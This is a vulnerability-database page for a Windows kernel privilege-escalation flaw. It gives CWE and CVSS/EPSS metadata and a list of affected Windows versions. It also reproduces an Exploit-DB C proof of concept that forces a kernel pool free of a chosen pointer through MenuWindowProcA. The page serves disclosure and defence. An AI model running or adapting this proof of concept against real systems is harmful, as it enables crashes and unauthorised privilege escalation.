Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-264 |
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 15894
Publication date : 2011-01-01 23h00 +00:00
Author : Tarjei Mandt
EDB Verified : Yes
#include <windows.h>
/*
Source:
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/
*/
int main(int argc, char **argv)
{
WNDCLASSA Class = {0};
CREATESTRUCTA Cs = {0};
FARPROC MenuWindowProcA;
HMODULE hModule;
HWND hWindow;
Class.lpfnWndProc = DefWindowProc;
Class.lpszClassName = "Class";
Class.cbWndExtra = sizeof(PVOID);
RegisterClassA(&Class);
hModule = LoadLibraryA("USER32.DLL");
MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");
hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);
// set the pointer value of the (soon to be) popup menu structure
SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);
// set WND->fnid = FNID_MENU
MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);
// trigger -> ExPoolFree(0x80808080)
DestroyWindow(hWindow);
return 0;
}
Products Mentioned
Configuraton 0
Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version -
Microsoft>>Windows_server_2003 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version -
Microsoft>>Windows_vista >> Version *
Microsoft>>Windows_vista >> Version *
Microsoft>>Windows_vista >> Version -
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version -
References